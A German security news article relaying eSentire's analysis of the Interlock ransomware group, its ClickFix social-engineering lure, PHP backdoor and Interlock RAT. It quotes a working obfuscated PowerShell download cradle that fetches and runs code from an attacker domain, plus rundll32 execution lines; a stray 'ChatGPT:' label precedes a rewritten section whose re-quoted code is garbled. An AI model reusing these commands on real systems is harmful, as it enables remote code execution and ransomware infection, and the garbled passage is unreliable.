Interlock-Ransomware nutzt ClickFix zur Ausführung bösartiger Befehle auf Windows-Systemen

Das sich stetig wandelnde Arsenal der Interlock-Gruppe rückt zunehmend in den Fokus der Cybersicherheitsforschung. + Mit der neuen Ransomware-Variante Interlock sorgt eine weitere Bedrohung für Aufmerksamkeit. Die Schadsoftware nutzt die Social-Engineering-Technik ClickFix, um auf Windows-Rechnern schädliche Befehle auszuführen. Die Kombination klassischer Phishing-Methoden mit mehrstufigen Bereitstellungsmechanismen zeigt eine bedenkliche Weiterentwicklung gängiger Ransomware-Taktiken.

Im Juli 2025 dokumentierte die Threat Response Unit (TRU) des Sicherheitsunternehmens eSentire mehrere komplexe Vorfälle, die der Interlock-Gruppe zugeschrieben werden. Die Gruppierung, aktiv seit September 2024, hat es vor allem auf Unternehmen in Nordamerika und Europa abgesehen.

Während der Analysen entdeckten die Forscher den Einsatz einer PHP-basierten Backdoor, über die eine zusätzliche Schadkomponente nachgeladen wurde. Dieses Tool, bekannt als Interlock RAT, agiert vorrangig als Backdoor und erlaubt den Angreifern die Ausführung verschiedener Kommandos zur weiteren Aufklärung und Ransomware-Verbreitung.

Die TRU-Analyse beleuchtet detailliert die eingesetzten Taktiken, Techniken und Verfahren (TTPs) der Gruppe: angefangen beim initialen Zugriff über ClickFix, über die eingesetzten Backdoors und Kommandos, bis hin zu Datendiebstahl und Aufklärungsaktivitäten. Der dabei entstandene Prozessbaum ist derart umfangreich, dass die Darstellung auf einem 4K-Monitor oder Großbildschirm empfohlen wird.

Zur Unterstützung der Analyse stellt eSentire zudem mehrere Python-Skripte bereit, mit denen sich einzelne Untersuchungsschritte automatisieren lassen.

Die Interlock-Ransomware verfolgt ein klares Ziel: finanzielle Erpressung durch doppelte Verschlüsselung und Drohung mit Datenveröffentlichung. Die Angriffe erfolgen über kompromittierte Websites und folgen einer ausgefeilten Angriffskette, die schließlich zur vollständigen Systemübernahme führt.

Mit dem Einsatz von PowerShell-Skripten, PHP-Backdoors und speziell entwickelten Fernzugriffswerkzeugen zeigt die Interlock-Gruppe ein hohes Maß an technischer Raffinesse. Die gewonnenen Erkenntnisse liefern der Sicherheits-Community wertvolle Hinweise zur besseren Verteidigung gegen diese Art von Bedrohung.

Der Angriff beginnt, wenn Opfer unwissentlich kompromittierte Websites besuchen, insbesondere solche, die über die KongTuke-Kompromittierungskette infiziert wurden, die die Benutzer anschließend auf bösartige ClickFix-Seiten umleitet.

ClickFix ist eine Social-Engineering-Technik, die Opfer durch gefälschte Fehlermeldungen oder Systembenachrichtigungen, die echt erscheinen, dazu verleitet, schädliche Befehle auszuführen.

Prozessbaum des Angriffs durch die Interlock Group (Quelle: eSentire)

Übersicht über den Angriff (Quelle: eSentire)

Diese Befehlszeile ist höchst ungewöhnlich und nutzt eine bekannte LOLBin (shell32.dll!ShellExec_RunDLL), um die Verknüpfung über die Shell-Ausführung auszuführen.

rundll32 shell32.dll,ShellExec_RunDLL “<8_CHARS>.lnk”

Sobald c2.exe ausgeführt wird, führt es einen PowerShell-Befehl aus, der zusätzliche PowerShell abruft und aufruft. Diese zusätzliche PowerShell lädt den PHP-Interpreter mit dem folgenden Befehl herunter und führt ihn aus:

„C:\Users\<REDACTED>\AppData\Roaming\php\php.exe“ -d extension=zip -d extension_dir=ext C:\Users\<REDACTED>\AppData\Roaming\php\config.cfg 1

Die Datei „config.cfg“ ist eine verschleierte PHP-basierte Hintertür, die mehrere Befehle unterstützt. Bei unserer Analyse haben wir festgestellt, dass die Interlock Group den Befehl „DLL“ sendet, der zum Herunterladen der Kern-Hintertür Interlock Backdoor AKA Interlock RAT in den AppData-Ordner als PNG-Datei und zu deren Ausführung über den folgenden Befehl führt:

rundll32.exe „<8_CHARS>.png“, start

Erster Zugriff

Für den ersten Zugriff hat TRU beobachtet, dass die Interlock Group KongTuke-kompromittierte Websites nutzt, um Opfer schließlich auf ClickFix-Seiten umzuleiten. ClickFix ist eine Social-Engineering-Technik, die Opfer auf kompromittierte Websites leitet, wo sie dazu verleitet werden, bösartige Befehle auszuführen.

Nach Ausführung des Befehls wird den Opfern eine gefälschte Fehlermeldung angezeigt. Sobald sie diese schließen, schreitet der Angriff wie folgt fort:

• Fingerprinting des Systems über den Befehl „systeminfo“, Senden an Command and Control (C2) und Zurücksenden einer Antwort zum Aufrufen in PowerShell.
• Herunterladen/Ausführen eines PHP-Interpreters und einer verschleierten PHP-basierten Backdoor namens „config.cfg“.

Ein Beispiel für einen verschleierten Befehl, der in die Zwischenablage eines Opfers kopiert wurde, ist unten zu sehen.

„C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe“ -w h -nop -c „$gt=’dng-m,i,crosoftds,com‘.Split(‚,‘);$yn=’htt’+’ps://’+$gt[0]+$gt[1]+$gt[2]+‘.’+$gt[3]+’/‘ + ‚uvA’+’4I’+’BD’+’9’+‘.txt‘;$ws=New-Object Net.WebClient;$sc=$ws.(‚Download’+’String‘)($yn);$zl=’i’+’ex‘;&$zl $sc“

Nach der Entschlüsselung kann man deutlich erkennen, dass es sich um einen Download-Cradle handelt, der die nächste Stufe von einer Remote-URL „hxxps://dng-microsoftds[.]com“ abruft und aufruft.

$yn=’hxxps://dng-microsoftds[.]com/uvA4IBD9.txt‘;
$ws=New-Object Net.WebClient;
$sc=$ws.(‚DownloadString‘)($yn);
iex $sc

ChatGPT:

Fortschrittlicher mehrstufiger Infektionsmechanismus bei Interlock

Die ausgeklügelte Architektur des Schadsoftware-Angriffs Interlock verdeutlicht das tiefgreifende Verständnis der Angreifer für Windows-Systeme und typische Nutzergewohnheiten. Bereits die erste Stufe – eine ClickFix-Nutzlast – nutzt einen verschleierten PowerShell-Befehl, der als Grundlage für nachgelagerte Aktivitäten dient.

Nach der Entschleierung zeigt sich ein präzise konstruierter Download-Mechanismus, der zusätzliche Schadkomponenten von einer Command-and-Control-Infrastruktur nachlädt. Dabei folgt der PowerShell-Code einem bestimmten Muster: $gt=‘dng-m,i,crosoftds,com‘.Split(‘,’);$yn=‘htt‘+'ps://‘+$gt+$gt[1]+$gt+‘.'+$gt+‘/‘ + ‘uvA‘+'4I'+‘BD‘+'9'+‘.txt‘.
Durch die Zerlegung und dynamische Zusammensetzung von Domänenbestandteilen umgehen die Angreifer einfache Erkennungsmethoden, ohne die Funktionalität zu beeinträchtigen.

Nach dem Ausführen des Skripts erfolgt eine Systemanalyse mittels „systeminfo“. Dabei werden detaillierte Informationen zur Hard- und Softwarestruktur gesammelt und an die Kontrollserver übertragen. Dieses sogenannte Fingerprinting dient dazu, das Zielsystem zu klassifizieren – entweder als lohnendes Angriffsziel oder als potenziellen Honeypot.

Je nach Einschätzung setzt die Malware die Infektionskette fort oder bricht den Prozess ab, um einer Entdeckung zu entgehen. Für eine dauerhafte Präsenz im System sorgt Interlock über manipulierte Windows-Verknüpfungen im Autostart-Ordner. Eine als c2.exe bezeichnete Komponente, der „Simple Process Launcher“, verwendet die Windows-API „CreateProcessW“, um neue PowerShell-Instanzen zu starten. Parallel dazu erscheinen gefälschte Fehlermeldungen, die Systemprobleme suggerieren sollen.

Diese Tarnung – kombiniert mit dem Einsatz legitimer Systemprogramme wie rundll32.exe – unterstreicht, wie geschickt die Angreifer ihre Aktivitäten im regulären Betriebsverhalten des Systems verbergen.

Quelle: eSentire – Ausführlichere Informationen und Hintergründe lesen Sie im vollständigen Artikel.

Das könnte Sie ebenfalls interessieren

---